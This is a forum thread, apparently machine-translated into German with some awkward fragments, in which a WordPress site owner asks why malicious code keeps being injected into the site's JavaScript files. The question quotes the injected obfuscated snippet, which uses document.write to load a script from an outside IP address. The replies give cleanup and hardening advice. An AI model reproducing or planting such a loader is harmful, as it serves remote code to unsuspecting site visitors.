Ich habe eine theme-basierte Wordpress-Website, aber seit den letzten paar Tagen die Website-Plugins funktionieren nicht, der Grund, ich fand, dass die ".js" Erweiterungsdateien mit dem schädlichen Code werdenwordpress website (theme based) weiter mit bösartigem Code injiziert
injiziertvar _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
nommenen Schritte es
- eingeschränkten Berechtigungen zu vermeiden, um eine Datei zu schreiben.
- geblockt ftp von keiner anderen ip als meine zugegriffen werden.
- versucht, den Code von der gesamten Website zu entfernen.
- hochgeladen die Sicherungsdateien. aber immer noch irgendwie der Code hält auf in fast allen javascript Dateien injiziert bekommen
Sie haben wahrscheinlich ein gefährliches Plugin. – SLaks
Ihr Backup könnte ebenfalls infiziert sein. Schauen Sie sich das Zugriffsprotokoll an und schauen Sie sich alle POST-Anfragen an, die oft eine Idee ergeben. – janh
Denken Sie daran, dass ein Angriff dieser Art normalerweise mehrere Hintertüren injiziert. Wenn Sie kein gültiges Backup haben, müssen Sie Ihre Dateien nach Blobs von PHP, Js und fremden Inhalten durchkämmen. Sie müssen auch in der Datenbank nach fremden Inhalten suchen. es ist normalerweise sehr einfach zu sehen, aber es ist lang zu finden. Es ist langweilig, um es gelinde auszudrücken. danach, stellen Sie sicher, dass Ihre Berechtigungen auf Minimum gesetzt sind, https://www.smashingmagazine.com/2014/05/proper-wordpress-filesystem-permissions-ownerships/ ist eine sehr gründliche Erklärung der Wordpress-Berechtigungen (ein bisschen auf dem Overkill Erklärungen, ja) –